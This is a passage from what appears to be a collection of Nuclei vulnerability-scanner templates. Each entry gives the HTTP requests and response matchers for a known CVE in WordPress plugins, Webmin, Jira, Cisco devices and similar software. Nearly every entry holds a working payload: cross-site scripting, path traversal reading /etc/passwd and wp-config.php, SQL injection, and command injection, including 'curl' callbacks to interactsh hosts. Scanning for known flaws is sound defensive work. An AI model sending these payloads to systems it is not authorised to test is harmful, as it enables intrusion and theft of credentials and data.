Online by BestWebSoft < 1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Visitors Online by\")"],"condition":"and"}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Skysa App"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/alert-before-your-post/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Featurific For Wordpress"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Adminimize ==="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-4640","info":{"name":"WebTitan < 3.60 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login-x.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login-x.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\njaction=login&language=en_US&username={{username}}&password={{password}}\n","GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"success\\\":true\")","contains(body_1, \"WebTitan\")","regex('root:.*:0:0:', body)","status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Grand Flagallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ClickDesk Live Support - Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nkeys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","!contains(body_1, \"phpinfo\")","contains_all(body_2, \"phpinfo\",\"PHP Version\")"],"condition":"and"}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Visualizer","Tested up to:"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/checklist/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Checklist","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-9632","info":{"name":"ESAFENET CDG - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/CDGServer3/ClientAjax"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["<servlet-name>CDGPermissions</servlet-name>"]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains_any(body, \"\\\"users\\\":\",\"\\\"usuario\\\":\")","contains_all(body, \"\\\"total\\\":\", \"\\\"header\\\":\")","status_code == 200 || status_code == 404"],"condition":"and"},{"type":"word","part":"body","words":["total\":0"],"negative":true}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15829","info":{"name":"Gallery Photoblocks < 1.1.43 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"post galleries!\")"],"condition":"and"}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/userpro/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site 